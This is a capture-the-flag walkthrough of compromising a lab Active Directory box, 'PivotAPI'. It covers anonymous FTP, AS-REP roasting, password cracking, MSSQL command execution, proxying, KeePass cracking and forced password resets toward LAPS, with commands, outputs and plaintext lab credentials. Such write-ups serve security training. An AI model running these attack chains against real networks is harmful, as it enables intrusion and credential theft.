$ nmap -p- --min-rate 5000 -Pn 10.129.228.115
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-20 23:06 +08
Nmap scan report for 10.129.228.115
Host is up (0.012s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
9389/tcp open adws
49667/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49695/tcp open unknown
49706/tcp open unknown
FTP -> AS-REP Roast
Whenever there's an FTP port open, we can check for anonymous access, and it works for this machine:
$ ftp 10.129.228.115
Connected to 10.129.228.115.
220 Microsoft FTP Service
Name (10.129.228.115:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49775|)
125 Data connection already open; Transfer starting.
02-19-21 03:06PM 103106 10.1.1.414.6453.pdf
02-19-21 03:06PM 656029 28475-linux-stack-based-buffer-overflows.pdf
02-19-21 12:55PM 1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
02-19-21 03:06PM 1018160 ExploitingSoftware-Ch07.pdf
08-08-20 01:18PM 219091 notes1.pdf
08-08-20 01:34PM 279445 notes2.pdf
08-08-20 01:41PM 105 README.txt
02-19-21 03:06PM 1301120 RHUL-MA-2009-06.pdf
There seems to be PDFs within this folder. I downloaded the README.txt file first.
$ cat README.txt
VERY IMPORTANT!!
Don't forget to change the download mode to binary so that the files are not corrupted.
Alright, we can change to binary mode and then download all of these files to our machine:
ftp> binary
200 Type set to I.
ftp> prompt off
Interactive mode off.
ftp> mget *
I viewed all the PDFs, which didn't include anything useful. Next, we can use exiftool to view the metadata of each file in case there's something like a vulnerable version of PDF reader indicated. Some of them contained username fields:
======== notes2.pdf
ExifTool Version Number : 12.57
File Name : notes2.pdf
Directory : .
File Size : 279 kB
File Modification Date/Time : 2020:08:08 19:34:25+08:00
File Access Date/Time : 2023:06:20 23:09:05+08:00
File Inode Change Date/Time : 2023:06:20 23:09:05+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 5
XMP Toolkit : Image::ExifTool 12.03
Creator : Kaorz
Publisher : LicorDeBellota.htb
Producer : cairo 1.10.2 (http://cairographics.org)
I put all the usernames into a single file, and also took note of the domain used here. Here are all the users:
byron.gronseth
bryon_gronseth
b.gronseth
bryon_g
bryon.g
bryon
gronseth
saif
Kaorz
alex
The first username might need some permutation, so I included some combinations in my username list. We can then use impacket-GetNPUsers since we have a username list:
This works! The hash can be easily cracked using john.
$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Roper4155 ($krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB)
1g 0:00:00:07 DONE (2023-06-20 23:16) 0.1426g/s 1522Kp/s 1522Kc/s 1522KC/s Roryarthur..Ronald8
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We now have credentials!
SMB + Bloodhound
I tried to view the shares, but we don't have access to anything special:
$ smbmap -u kaorz -p Roper4155 -H 10.129.228.115
[+] IP: 10.129.228.115:445 Name: LicorDeBellota.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON READ ONLY Recurso compartido del servidor de inicio de sesión
SYSVOL READ ONLY Recurso compartido del servidor de inicio de sesión
We can take a look at the shares anyway. The NETLOGON share contained a HelpDesk file:
$ smbclient -U 'Kaorz' //10.129.228.115/NETLOGON
Password for [WORKGROUP\Kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 8 18:42:28 2020
.. D 0 Sat Aug 8 18:42:28 2020
HelpDesk D 0 Sun Aug 9 23:40:36 2020
5158399 blocks of size 4096. 1105115 blocks available
smb: \HelpDesk\> ls
. D 0 Sun Aug 9 23:40:36 2020
.. D 0 Sun Aug 9 23:40:36 2020
Restart-OracleService.exe A 1854976 Fri Feb 19 18:52:01 2021
Server MSSQL.msg A 24576 Sun Aug 9 19:04:14 2020
WinRM Service.msg A 26112 Sun Aug 9 19:42:20 2020
5158399 blocks of size 4096. 1105110 blocks available
Then, we can take a look at these files:
$ file Restart-OracleService.exe
Restart-OracleService.exe: PE32+ executable (console) x86-64, for MS Windows
$ file Server\ MSSQL.msg
Server MSSQL.msg: CDFV2 Microsoft Outlook Message
$ file WinRM\ Service.msg
WinRM Service.msg: CDFV2 Microsoft Outlook Message
I transferred this to my Windows VM for some reverse engineering.
I also used bloodhound-python to collect information about the domain for me. The first time I ran it, it generated this error:
WARNING: DCE/RPC connection failed: [Errno Connection error (pivotapi.licordebellota.htb:88)] [Errno -2] Name or service not known
INFO: Done in 00M 02
So we have to add another subdomain to our /etc/hosts file to enumerate properly. Then, we can run the command again:
$ bloodhound-python -d LicorDeBellota.htb -u Kaorz -p Roper4155 -c all -ns 10.129.228.115
INFO: Found AD domain: licordebellota.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: pivotapi.licordebellota.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: pivotapi.licordebellota.htb
INFO: Found 28 users
INFO: Found 58 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: PivotAPI.LicorDeBellota.htb
INFO: Done in 00M 02S
Afterwards, start neo4j and bloodhound. The names of the box are in Spanish, so take note of that. However, the bloodhound graph showcased nothing of interest for our current user and we have no privileges. When looking at all domain users, we find a svc_mssql user present:
The nmap scan earlier shows that port 1433 is indeed open. Checking this user's group memberships shows that it is part of the WinRM group, which is in turn part of the Remote Administration Group (I think).
The steps are rather clear, we need to somehow reverse engineer that .exe file to gain a shell as the svc_mssql user.
Reverse Engineering
I transferred this over to my Windows VM. Running it seems to do nothing oddly:
I took a look at the logs created using Sysmon, and found some weird commands being executed. Firstly, this thing created a .bat file:
Afterwards, it used it ot do something else:
It also seems that this file is being destroyed by the binary after running. To catch this file, we would have to use a Powershell infinite loop that would keep checking for both directories and the .bat file being created, and then read the output of it.
It was rather difficult to catch this .bat file for some reason, and I took a lot of runs before being able to. I used a simple Powershell loop that reads the file:
Since we have this .bat file, we can simply execute it after using set to change our username temporarily. We can also remove the del commands to preserve the files:
set username=cybervaca
.\<name>.bat
This would create the files that we want (after taking a few minutes). Afterwards, we would get a monta.ps1 and a restart-service.exe file on our machine. Also, it detects this as raare, so make sure to include the needed exclusions from Defender.
-a---- 6/20/2023 11:59 PM 1746599 B811.bat
-a---- 6/21/2023 12:05 AM 273 monta.ps1
-a---- 6/21/2023 12:05 AM 1202440 oracle.txt
-a---- 6/21/2023 12:06 AM 864768 restart-service.exe
Afterwards, we can reverse engineer the restart-service.exe file. Running it just produces this ASCII art:
It doesn't generate any logs of interest in Sysmon, so we have to delve deeper into the processes spawned. In this case, I used API Monitor to do this. When I ran the binary within API monitor, it generated quite a lot of stuff. I disabled the filter to view everything:
I tried searching for 'Password' and found it here!
MS-SQL Access -> PrintSpoof Fail
Now that we have creds for svc_oracle, let's try to access the database as it. However, it appears that this svc_oracle user is not present anywhere within the domain users, and only svc_mssql is.
The password was contained both oracle and 2010. I was stuck here for a long time, and looked at a guide. Turns out we just need to change the password to have mssql instead of oracle and 2020 instead of 2010 (which I felt was an unecessary step for this machine at this point).
Anyways, we can then access the database as the sa user.
Next, we can check whether we have xp_cmdshell access.
We do! I looked around the file system to find some interesting stuff. First, I checked the users:
I cannot access any of these files as my current user, which is quite annoying. The next thing to check would be our privileges, since we are in fact, a service account user. This means that we can potentially have the SeImpersonatePrivilege enabled, which we do!
Nombre de privilegio Descripción Estado
============================= ================================================= =============
SeAssignPrimaryTokenPrivilege Reemplazar un símbolo (token) de nivel de proceso Deshabilitado
SeIncreaseQuotaPrivilege Ajustar las cuotas de la memoria para un proceso Deshabilitado
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Deshabilitado
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeManageVolumePrivilege Realizar tareas de mantenimiento del volumen Habilitada
SeImpersonatePrivilege Suplantar a un cliente tras la autenticación Habilitada
SeCreateGlobalPrivilege Crear objetos globales Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado
Because this is enabled, we can use PrintSpoofer.exe to execute commands. Problem is, I am not able to transfer the binary to the machine since it complains that there's no route to my machine. So, we have to use base64 encoded strings to do this.
When googling for MSSQL Shells with upload capabilities, I came across this:
This shell works after changing the credentials:
Now, we can upload PrintSpoofer.exe to the machine.
However, this just doesn't work for some reason. I think the author must've patched the usage of PrintSpoofer, because in theory it would lead to an automatic root shell.
Port Forward -> WinRM Fail
I noted that it was not possible for me to connect back to my host, probably due to firewall rules blocking inbound WinRM connections. We can read the rules using Get-NetFirewallRules. Again, it's all in Spanish.
Name : {647E1258-90D4-47EE-B28A-82DE515A1326}
DisplayName : Deny WinRM
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Inbound
Action : Block
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : Se analizó la regla correctamente desde el almacén. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local
In this case, we would have to proxy our traffic using the MSSQL instance somehow. Googling for MSSQL Proxy leads me to this project:
We can download the compiled DLLs and modified mssqslclient.py file onto our Kali machine. Then, we can use our UPLOAD shell to upload the reciclador.dll file:
Then we can install the assembly.dll file (which has been renamed).
Then we can runthe same command using -start -reciclador 'C:\Windows\Temp\reciclador.dll.
This would open a listener port on our port 1337, which is supposed to let us conenct via WinRM in, but I kept getting this error when running it.
$ python2 mssqlclient.py 'LicorDeBellota.htb/sa:#mssql_s3rV1c3!2020@10.129.228.115' -start -reciclador 'C:\Windows\Temp\reciclador.dll'/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[*] Proxy mode: check
[*] Assembly is installed
[*] Procedure is installed
[*] reciclador is installed
[*] clr enabled
[*] Proxy mode: start
[*] Listening on port 1337...
[*] ACK from server!
[*] Bye!
The connection kept cutting out when I connected via this method, so this again, doesn't work.
Remote Powershell -> Keepass Crack
My last option was to use base64 encoded Powershell commands to run stuff on the machine (at this point I was looking at a writeup). 0xdf used this in his Unintended Methods part of his writeup:
Afterwards, we can crack this database password using keepass2john.
$ john --wordlist=/usr/share/wordlists/rockyou.txt kp_hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mahalkita (decoded)
1g 0:00:00:00 DONE (2023-06-21 11:22) 1.470g/s 305.8p/s 305.8c/s 305.8C/s alyssa..jeremy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Then we can access the database:
$ kpcli -kdb decoded
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/>
kpcli:/Database/Windows> show 0 -f
Title: SSH
Uname: 3v4Si0N
Pass: Gu4nCh3C4NaRi0N!23
URL:
Notes:
Then, we can finally access the user here:
Privilege Escalation
Back to Bloodhound
Now that we have a new user to play with, we should take a look at the Bloodhound output again. Here, we find that our current user has GenericAll privileges over some other users:
Only the Dr.Zaiuss has a file in C:\Users, so that's the next step. We also find that this user has control over superfume, which in turn is part of the Developers group:
Those are the next obvious steps.
ForceChangePassword
We can upload PowerView.ps1 via scp to the current user's directory, and then run these:
Then, we can upload PowerView.ps1 and run the same commands with superfume this time. Since superfume is also not part of the SSH group, we can just use evil-winrm again:
Developer RE -> Creds
Within the main C:\ directory, there's a Developers file:
It appears we have another Reverse Engineering to do. There are some credentials being passed around within this program. In this case, we can grab this binary and transfer it back to our Windows machine for some reverse engineering.
Since they provided the source code in C#, I opened this binary up in dnSpy. In this, we see the completed program with the correct cipher:
We can set a breakpoint at the Console.WriteLine function, which is right after the Decrypt function. Then, within the local variables, we would see this part here:
The array variable contains the decoded password, and we can convert all of this to text.
We can then grab access to the user jari.
ForceChangePassword -> Account Operators
This new user is part of a new group:
*Evil-WinRM* PS C:\Users\jari\Documents> net user jari
Nombre de usuario jari
Nombre completo Jari Laox
Comentario
Comentario del usuario
C¢digo de pa¡s o regi¢n 000 (Predeterminado por el equipo)
Cuenta activa S¡
La cuenta expira Nunca
Ultimo cambio de contrase¤a 04/05/2021 20:11:39
La contrase¤a expira Nunca
Cambio de contrase¤a 05/05/2021 20:11:39
Contrase¤a requerida S¡
El usuario puede cambiar la contrase¤a S¡
Estaciones de trabajo autorizadas Todas
Script de inicio de sesi¢n
Perfil de usuario
Directorio principal
Ultima sesi¢n iniciada 08/08/2020 16:21:57
Horas de inicio de sesi¢n autorizadas Todas
Miembros del grupo local *Usuarios de administr
Miembros del grupo global *Usuarios del dominio
*Developers
*WinRM
Going back to Bloodhound, we see that the new user jari has ForceChangePassword privilege over two other users, with one being a bit more important than the other:
The gibdeon user is part of the Account Operations group (after translation). We can first reset the user's password using the same commands as the other password resets gibdeon user is not part of either SSH or WinRM groups, so we probably use remote Powershell scriptblocks to abuse this.
The Account Operators group has GenericAll privileges over the LAPS READ group, and can also create new non-administrator accounts within the domain (in-built AD privilege).
Since we basically have access to all groups in this domain, we can just add our jari user to both LAPS READ and LAPS ADM.
LAPS Read
First, we have to import a PSCredential object in order to execute commands as gibdeon from our jari shell:
